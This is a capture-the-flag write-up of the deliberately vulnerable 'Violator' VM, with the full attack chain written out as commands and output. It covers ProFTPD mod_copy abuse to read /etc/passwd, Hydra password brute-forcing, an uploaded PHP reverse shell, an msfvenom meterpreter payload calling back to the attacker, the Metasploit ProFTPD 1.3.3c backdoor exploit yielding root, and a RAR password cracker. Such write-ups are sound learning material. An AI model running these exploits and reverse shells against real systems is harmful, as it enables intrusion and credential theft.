A while back knightmare asked me to test his boot2root challenge named Violator. Having thoroughly enjoyed his first 3 Droopy, Gibson and Sidney I jumped at the opportunity.
Like his other VMs it had a theme, this one being Depeche Mode themed.
You can grab a copy for yourself here: https://www.vulnhub.com/entry/violator-1,153/
When testing a boot2root I typically approach it as any other challenge, only stopping along the way if I feel I discover a flaw/unintended path, something appears to be broken or I just 100% hit a wall.
Knightmare provided me with the following hints to get going (I’ve also learned by now to set the HDD on all his VMs to non-persistent 🙂 ) :
- Vince Clarke can help you with the Fast Fashion.
- The challenge isn’t over with root. The flag is something special.
- I have put a few trolls in, but only to sport with you.
Without further ado, here goes:
As always, we start off with a quick nmap scan. This one turns up an FTP service and Apache web server.
root@mrb3n:/# nmap -sV 192.168.110.183 Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-09-16 10:13 EDT Nmap scan report for 192.168.110.183 Host is up (0.00011s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5rc3 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) MAC Address: 00:0C:29:7D:C7:3C (VMware) Service Info: OS: Unix
The web server is pretty sparse. There is an image of Foghorn Leghorn from Looney Tunes as well as a link to a Wikipedia page about the Depeche Mode album ‘Violator, which I can only assume is a hint for later.
root@mrb3n:~# curl -s http://192.168.110.183
<html>
<title>I Say... I say... I say Boy! You pumpin' for oil or somethin'...?</title>
<body>
<br>I Say.. I say... I say boy! You're barkin up the wrong tree!</br>
<img src="foggie.jpg" alt="foggie.jpg" height=1041" width="731">
<-- https://en.wikipedia.org/wiki/Violator_(album) -->
</body>
</html>
I pulled down the image and checked it with exiftool but did not find any hidden treasures.
Leaving the web server aside and taking a look at the FTP service banner, I find a ProFTPD 1.3.5 File Copy exploit over on exploit-db. Maybe I can use this to pull down something interesting?
I attempt to connect anonymously and get rejected so let’s try out this exploit. If successful, I will be able to use the mod_copy module SITE CPFR/SITE CPTO commands to read/write files remotely and unauthenticated.
root@mrb3n:~# ftp 192.168.110.183 Connected to 192.168.110.183. 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183] Name (192.168.110.183:root): anonymous 331 Password required for anonymous Password: 530 Login incorrect. Login failed. Remote system type is UNIX. Using binary mode to transfer files. ftp>
I go after /etc/passwd first.
ftp> site CPFR /etc/passwd 350 File or directory exists, ready for destination name ftp> site CPTO /var/www/html/passwd 250 Copy successful ftp>
Awesome! The web root is writeable and I was able to grab down a list of usernames.
root@mrb3n:~# curl -s http://192.168.110.183/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin libuuid:x:100:101::/var/lib/libuuid: syslog:x:101:104::/home/syslog:/bin/false messagebus:x:102:106::/var/run/dbus:/bin/false landscape:x:103:109::/var/lib/landscape:/bin/false dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash proftpd:x:104:65534::/var/run/proftpd:/bin/false ftp:x:105:65534::/srv/ftp:/bin/false mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
So here we have a list of local usernames, which happen to be the members of Depeche Mode. I attempted to grab /etc/shadow but was denied. I grabbed the groups file to see what types of permissions each users have on the target system.
ftp> site CPFR /etc/group 350 File or directory exists, ready for destination name ftp> site CPTO /var/www/html/group 250 Copy successful root@mrb3n:~/violator# curl -s http://192.168.110.183/group > group root@mrb3n:~/violator# cat group | grep sudo sudo:x:27:dg
The user dg is in the sudoers group so hopefully we can get his creds somehow! At this point I figured I needed some sort of wordlist. The Wikipedia page in the index page source seems like a good candidate. Firing up Cewl I put together a quick wordlist.
root@mrb3n:~/violator# cewl -v 'en.wikipedia.org/wiki/Violator_(album)' -d 1 -w violator.txt
This wordlist didnt get me anywhere. After some fumbling around with various combinations I settled on a wordlist of with all of the song titles, lowercase, without spaces or special characters. First we remove all spaces.
root@mrb3n:~/violator# sed 's/ //g' violator > violator_nospaces
We can clean things up a bit more with cut and tr.
root@mrb3n:~/violator# cut -d'"' -f2 violator_nospaces | tr '[:upper:]' '[:lower:]' > violator_list root@mrb3n:~/violator# cat violator_list worldinmyeyes sweetestperfection personaljesus halo waitingforthenight enjoythesilence policyoftruth bluedress clean dangerous memphisto sibeling kaleid happiestgirl seaofsin enjoythesilence enjoythesilence enjoythesilence sibeling enjoythesilence enjoythesilence enjoythesilence memphisto
Interesting enough Hydra finds valid passwords for all 4 users. Dg is my target so let’s check his account first.
root@mrb3n:~/violator# hydra -L users -P violator_list ftp://192.168.110.183 Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-16 14:00:35 [DATA] max 16 tasks per 1 server, overall 64 tasks, 96 login tries (l:4/p:24), ~0 tries per task [DATA] attacking service ftp on port 21 [21][ftp] host: 192.168.110.183 login: dg password: policyoftruth [21][ftp] host: 192.168.110.183 login: mg password: bluedress [21][ftp] host: 192.168.110.183 login: af password: enjoythesilence [21][ftp] host: 192.168.110.183 login: aw password: sweetestperfection 1 of 1 target successfully completed, 4 valid passwords found
Logging in I am in dg’s home directory and am able to change to various other directories, including those for our other 3 users.
root@mrb3n:~# ftp 192.168.110.183 Connected to 192.168.110.183. 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183] Name (192.168.110.183:root): dg 331 Password required for dg Password: 230 User dg logged in Remote system type is UNIX. Using binary mode to transfer files. ftp> pwd 257 "/home/dg" is the current directory ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxr-xr-x 10 root root 4096 Jun 6 20:31 bd 226 Transfer complete ftp> cd .. 250 CWD command successful ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxr-xr-x 3 af af 4096 Jun 12 09:25 af drwxr-xr-x 2 aw aw 4096 Jun 12 09:25 aw drwxr-xr-x 4 dg dg 4096 Jun 14 18:55 dg drwxr-xr-x 2 mg mg 4096 Jun 12 09:28 mg
I pull down various files for inspection locally.
ftp> get minarke-1.21.tar.bz2 local: minarke-1.21.tar.bz2 remote: minarke-1.21.tar.bz2 200 PORT command successful 150 Opening BINARY mode data connection for minarke-1.21.tar.bz2 (15576 bytes) 226 Transfer complete 15576 bytes received in 0.01 secs (2.7953 MB/s) 150 Opening ASCII mode data connection for file list -rw-rw-r-- 1 aw aw 59 Jun 12 09:19 hint 226 Transfer complete ftp> get hint local: hint remote: hint 150 Opening ASCII mode data connection for file list -rw-rw-r-- 1 mg mg 112 Jun 12 09:28 faith_and_devotion 226 Transfer complete ftp> get faith_and_devotion local: faith_and_devotion remote: faith_and_devotion 200 PORT command successful 150 Opening BINARY mode data connection for faith_and_devotion (112 bytes) 226 Transfer complete
Dg’s home directory contains a more extensive directory listing which we’ll have to come back to later.
ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxr-xr-x 2 root root 4096 Jun 6 20:31 bin drwxr-xr-x 2 root root 4096 Jun 6 20:46 etc drwxr-xr-x 3 root root 4096 Jun 6 20:31 include drwxr-xr-x 4 root root 4096 Jun 6 20:31 lib drwxr-xr-x 2 root root 4096 Jun 6 20:31 libexec drwxr-xr-x 2 root root 4096 Jun 6 20:31 sbin drwxr-xr-x 4 root root 4096 Jun 6 20:31 share drwxr-xr-x 2 root root 4096 Jun 6 22:17 var
Taking a look at our loot, the hint file is a bit vague…for now…
root@mrb3n:~/violator# cat hint You are getting close... Can you crack the final enigma..?
The Minarke archive is interesting a C file and make file for compiling an Enigma M4 emulator. We know that knightmare is infamous for flag challenges so I am almost certain this will come into play later.
root@mrb3n:~/violator/minarke-1.21# cat minarke.c /* Minarke, an Enigma M4 emulator * * Written by John Gilbert * Version 1.21 * (c) 2008
I compile it and check out the binary. Our suspicions are confirmed. this can be used to crack some Enigma code. Pretty awesome. Now lets find that code!
root@mrb3n:~/violator/minarke-1.21# make gcc -g -Wall -o minarke minarke.c root@mrb3n:~/violator/minarke-1.21# ./minarke Minarke, an Enigma M4 emulator by John Gilbert Emulates the Kriegsmarine M4 Enigma encryption machine Initial Setup Notes Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them) Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic Ring and position settings: A-Z for each of the 4 rotors Reflector setting is always fixed at A. Plugboard settings: A-Z,A-Z pairs, also won't allow reuse Hit return to end input, 11 pairs recomended for maximum security. Hit ESC at any time to quit. Special Keys (during input mode) 1: rewind one setting 2: reset position settings 3: new position settings 4: new setup 9: toggle debug 0: show position settings ?: show help see http://en.wikipedia.org/wiki/Enigma_machine also http://www.bytereef.org/m4_project.html Rotors:
The faith_and_devotion file contains what we need to use the Enigma machine once we have the code.
root@mrb3n:~/violator# cat faith_and_devotion Lyrics: * Use Wermacht with 3 rotors * Reflector to B Initial: A B C Alphabet Ring: C B A Plug Board A-B, C-D
Now I need a shell. Since /var/www/html appears to be writeable. I attempt to upload a PHP reverse shell. If all goes well and knightmare doesnt have any tricks up his sleeve I should be able to grab a nice reverse shell.
root@mrb3n:~# ftp 192.168.110.183 Connected to 192.168.110.183. 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.110.183] Name (192.168.110.183:root): dg 331 Password required for dg Password: 230 User dg logged in Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /var/www/html 250 CWD command successful ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list -rw-rw-r-- 1 dg dg 51256 Jun 6 20:00 foggie.jpg -rw-r--r-- 1 proftpd nogroup 699 Sep 16 17:39 group -rw-rw-r-- 1 dg dg 318 Jun 12 17:26 index.html -rw-r--r-- 1 proftpd nogroup 1330 Sep 16 15:24 passwd 226 Transfer complete ftp> put /var/www/html/violator.php local: /var/www/html/violator.php remote: /var/www/html/violator.php 200 PORT command successful 150 Opening BINARY mode data connection for /var/www/html/violator.php 226 Transfer complete 3463 bytes sent in 0.00 secs (33.0257 MB/s) ftp> ls 200 PORT command successful 150 Opening ASCII mode data connection for file list -rw-rw-r-- 1 dg dg 51256 Jun 6 20:00 foggie.jpg -rw-r--r-- 1 proftpd nogroup 699 Sep 16 17:39 group -rw-rw-r-- 1 dg dg 318 Jun 12 17:26 index.html -rw-r--r-- 1 proftpd nogroup 1330 Sep 16 15:24 passwd -rw-r--r-- 1 dg dg 3463 Sep 16 18:18 violator.php 226 Transfer complete
I browse to my violator.php reverse shell script and sure enough get a connection as www-data.
root@mrb3n:~/violator# curl -s http://192.168.110.183/violator.php
root@mrb3n:~# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.110.179] from (UNKNOWN) [192.168.110.183] 33641
Linux violator 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
19:20:09 up 3:00, 0 users, load average: 0.00, 0.01, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@violator:/$
I su to the dg user and check what he is able to run as root, since I remembered from earlier that he is part of the sudoers group. Interesting, he can run another version of proftpd as root which what we saw earlier in his home directory.
www-data@violator:/$ su dg
su dg
Password: policyoftruth
dg@violator:/$ sudo -l
sudo -l
Matching Defaults entries for dg on violator:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dg may run the following commands on violator:
(ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
dg@violator:~/bd/sbin$ file proftpd file proftpd proftpd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=8abf34e54323fc0bb0320d1ea3750da2e57ecd08, stripped dg@violator:~/bd/sbin$ sudo ./proftpd sudo ./proftpd - setting default address to 127.0.0.1 localhost - SocketBindTight in effect, ignoring DefaultServer
We now have another service running locally on port 2121. How can this be abused to gain root privs?
dg@violator:~/bd/sbin$ netstat -antp netstat -antp (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.1:2121 0.0.0.0:* LISTEN - tcp 0 218 192.168.110.183:33641 192.168.110.179:443 ESTABLISHED 1391/bash tcp6 0 0 :::21 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 192.168.110.183:80 192.168.110.179:56414 ESTABLISHED - tcp6 0 0 192.168.110.183:21 192.168.110.179:56886 ESTABLISHED -
Connection to port 2121 locally I see we are dealing with ProFTPD 1.3.3c.
dg@violator:~/bd/sbin$ telnet 127.0.0.1 2121 telnet 127.0.0.1 2121 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. 220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]
This particular FTP client has a known backdoor command execution vulnerability which hopefully we can use to escalate privileges. There are many ways to do this, the way I did it worked but of course there are other options
root@mrb3n:~# searchsploit ProFTPD 1.3.3c
------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
------------------------------------------------- ----------------------------------
ProFTPD 1.3.3c - Compromised Source Remote Root | ./linux/remote/15662.txt
ProFTPD-1.3.3c Backdoor Command Execution | ./linux/remote/16921.rb
It looks like I will need Metasploit to take advantage of this exploit so I quickly create a meterpreter PHP payload and upload it to the target, execute and grab a meterpreter shell.
root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php
root@mrb3n:/var/www/html# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.110.179 LPORT=8443 -f raw > violator_meterp.php
I could have used FTP to transfer the file, but after seeing that knightmare was kind enough to remove curl and wget I had to find another way.
Connection closed by foreign host. dg@violator:~/bd/sbin$ wget http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php < http://192.168.110.179/violator_meterp.php -O /var/www/html/shell.php The program 'wget' is currently not installed. You can install it by typing: sudo apt-get install wget dg@violator:~/bd/sbin$ curl -O http://192.168.110.179/violator_meterp.php curl -O http://192.168.110.179/violator_meterp.php The program 'curl' is currently not installed. You can install it by typing: sudo apt-get install curl
SCP was still installed so I was able to transfer the file that way, as root which is super secure!
dg@violator:/var/www/html$ scp root@192.168.110.179:/var/www/html/violator_meterp.php . <scp root@192.168.110.179:/var/www/html/violator_meterp.php .               root@192.168.110.179's password: 🙂 violator_meterp.php                          100%  26KB 25.6KB/s  00:00
Don’t forget to chown the file as dg so we can catch a session as this user.
dg@violator:/var/www/html$ chown dg:dg violator_meterp.php
Quickly set up metasploit to catch our shiny new meterpreter shell.
msf > use multi/handler msf exploit(handler) > set payload php/meterpreter_reverse_tcp payload => php/meterpreter_reverse_tcp msf exploit(handler) > set lhost 192.168.110.179 lhost => 192.168.110.179 msf exploit(handler) > set lport 8443 lport => 8443
Executing the shell I gain a connection and its time to set up some port forwarding so I can attack remote port 2121 directly.
dg@violator:/var/www/html$ phpviolator_meterp.php msf exploit(handler) > exploit [*] Started reverse TCP handler on 192.168.110.179:8443 [*] Starting the payload handler... [*] Meterpreter session 1 opened (192.168.110.179:8443 -> 192.168.110.183:35213) at 2016-09-16 14:50:38 -0400
I use the built-in meterpreter portfwd command to set up the tcp relay.
meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1 [*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121
Searching in metasploit I quickly find the exploit I’m looking for and configure it based on our port forwarding rule.
msf exploit(handler) > search ProFTPD Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) exploit/linux/ftp/proftp_sreplace 2006-11-26 great ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux) exploit/linux/misc/netsupport_manager_agent 2011-01-08 average NetSupport Manager Agent Remote Buffer Overflow exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent ProFTPD-1.3.3c Backdoor Command Execution exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent ProFTPD 1.3.5 Mod_Copy Command Execution
msf exploit(proftpd_133c_backdoor) > use cmd/unix/reverse_perl msf payload(reverse_perl) > show options Module options (payload/cmd/unix/reverse_perl):   Name  Current Setting Required Description   ----  --------------- -------- -----------   LHOST                  yes      The listen address   LPORT 4444            yes      The listen port msf payload(reverse_perl) > set LHOST 192.168.110.179 LHOST => 192.168.110.179 msf payload(reverse_perl) > exploit [-] Unknown command: exploit. msf payload(reverse_perl) > use exploit/unix/ftp/proftpd_133c_backdoor msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl payload => cmd/unix/reverse_perl msf exploit(proftpd_133c_backdoor) > set LHOST 192.168.110.179 LHOST => 192.168.110.179
I run the exploit and pop a root shell.
msf exploit(proftpd_133c_backdoor) > exploit
[*] Started reverse TCP handler on 192.168.110.179:4444
[*] Sending Backdoor Command
[*] Command shell session 6 opened (192.168.110.179:4444 -> 192.168.110.183:44484) at 2016-09-16 15:59:57 -0400
id
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
python -c 'import pty;pty.spawn("/bin/bash")'
root@violator:/#
Checking for our flag, as I expected, was a troll 🙂
root@violator:/root# cat flag.txt cat flag.txt I say... I say... I say boy! Pumping for oil or something...? ---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
The hidden directory ‘basildon’ in the root directory contains a file, crocs.rar.
root@violator:/root# ls -lah ls -lah total 24K drwx------ 3 root root 4.0K Jun 14 19:56 . drwxr-xr-x 22 root root 4.0K Jun 14 19:44 .. -rw-r--r-- 1 root root 3.1K Feb 20 2014 .bashrc d--x------ 2 root root 4.0K Jun 14 19:57 .basildon -rw-r--r-- 1 root root 114 Jun 12 10:22 flag.txt -rw-r--r-- 1 root root 140 Feb 20 2014 .profile root@violator:/root# cd .basildon cd .basildon root@violator:/root/.basildon# ls -lah ls -lah total 148K d--x------ 2 root root 4.0K Jun 14 19:57 . drwx------ 3 root root 4.0K Jun 14 19:56 .. -rw-r--r-- 1 root root 138K Jun 12 14:46 crocs.rar
I move the file over to the web root and pull it down locally for analysis.
root@mrb3n:~/violator# curl -O http://192.168.110.183/crocs.rar
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 137k 100 137k 0 0 20.6M 0 --:--:-- --:--:-- --:--:-- 22.3M
root@mrb3n:~/violator# file crocs.rar
crocs.rar: RAR archive data, v1d, os: Win32
root@mrb3n:~/violator# unrar e crocs.rar
UNRAR 5.21 freeware Copyright (c) 1993-2015 Alexander Roshal
Extracting from crocs.rar
Enter password (will not be echoed) for artwork.jpg:
Hmm, a password protected rar containing an image file. I was stuck here for a while. First I used Cewl to create a word list based on our original Wikipedia page but had no luck. I then ran the earlier song list without spaces that got us our user accounts and still no luck. Combining everything I had and using a quick rar brute force Python script I got a result.
#!/usr/bin/python
import rarfile
import subprocess
subprocess.call('clear', shell=True)
print "Rar file password brute forcer" + '\n'
rFile = rarfile.RarFile('crocs.rar')
PassFile = open('violator_songs')
for line in PassFile.readlines():
password = line.strip('\n')
try:
rFile.extractall(pwd=password)
print 'Correct Password = ' + password + '\n'
exit(0)
except Exception, e:
pass
Our password, and the artwork.jpg file!
root@mrb3n:~/violator# python rarcracker.py Rar file password brute forcer Correct Password = World in My Eyes
This time exiftool gave us something juicy, which I believe is our Engima code.
root@mrb3n:~/violator# wine /root/Desktop/exiftool.exe artwork.jpg ExifTool Version Number : 10.07 File Name : artwork.jpg Directory : . File Size : 183 kB File Modification Date/Time : 2016:06:12 14:38:12-04:00 File Access Date/Time : 2016:09:16 21:03:34-04:00 File Creation Date/Time : 2016:06:12 14:38:12-04:00 File Permissions : rw-rw-rw- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Resolution Unit : inches X Resolution : 300 Y Resolution : 300 Exif Byte Order : Big-endian (Motorola, MM) Image Description : Violator Software : Google Artist : Dave Gaham Copyright : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI Exif Version : 0220 Date/Time Original : 1990:03:19 22:13:30 Create Date : 1990:03:19 22:13:30 Sub Sec Time Original : 04 Sub Sec Time Digitized : 04 Exif Image Width : 1450 Exif Image Height : 1450 XP Title : Violator XP Author : Dave Gaham XP Keywords : created by user dg XP Subject : policyoftruth Padding : (Binary data 1590 bytes, use -b option to extract) About : uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b Rights : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI Creator : Dave Gaham Subject : created by user dg Title : Violator Description : Violator Warning : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto Date Acquired : 1941:05:09 10:30:18.134 Last Keyword XMP : created by user dg Image Width : 1450 Image Height : 1450 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 1450x1450 Megapixels : 2.1 Create Date : 1990:03:19 22:13:30.04 Date/Time Original : 1990:03:19 22:13:30.04
I was unable to get the Minarke program to work but the following decoder decoded the text for me. I just had to fix up the spacing to fully read the message.
ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE DELIBERATLY AVOIDING THE OBVIOUS ROUTE IN TO KEEP YOU ON YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR SHOUT OUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN KNIGHTMARE
An update on knightmare’s Twitter here tells us that the final message should read BGH 393X. A little research leads us to this message board which tells us that this is the license plate for a 1981 Ford Corina MkV in the music video for the Depeche Mode song ‘Useless’.
Overall this one a fun VM with plenty of twists and turns. I learned some new techniques and about the band Depeche Mode. Thank you knightmare for the challenge and sharing a bit of culture with us.
As always, thank you to g0tmi1k and the vulnhub team for maintaining this great resource/community.
Until next time, enjoy the music!